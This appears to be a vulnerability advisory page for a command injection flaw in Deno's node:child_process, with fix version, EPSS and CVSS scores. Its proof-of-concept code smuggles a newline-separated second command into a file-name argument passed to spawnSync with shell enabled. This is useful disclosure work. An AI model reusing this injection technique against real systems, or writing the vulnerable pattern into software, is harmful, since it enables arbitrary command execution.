CVE-2026-27190
Deno has a Command Injection via Incomplete shell metacharacter blocklist in node:child_process
Description
## Summary A command injection vulnerability exists in Deno's `node:child_process` implementation. ## Reproduction ```javascript import { spawnSync } from "node:child_process"; import * as fs from "node:fs"; // Cleanup try { fs.unlinkSync('/tmp/rce_proof'); } catch {} // Create legitimate script fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");'); // Malicious input with newline injection const maliciousInput = `/tmp/legitimate.ts\ntouch /tmp/rce_proof`; // Vulnerable pattern spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], { shell: true, encoding: 'utf-8' }); // Verify console.log('Exploit worked:', fs.existsSync('/tmp/rce_proof')); ``` Run: `deno run --allow-all poc.mjs` The file `/tmp/rce_proof` is created, confirming arbitrary command execution. ## Mitigation All users need to update to the patched version (Deno v2.6.8).
How to fix CVE-2026-27190
To remediate CVE-2026-27190, upgrade the affected package to a fixed version below.
- —upgrade to 2.6.8 or later
Is CVE-2026-27190 being exploited?
Low — EPSS is 0.9%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- from 0, < 2.6.8
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH8.1 | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H |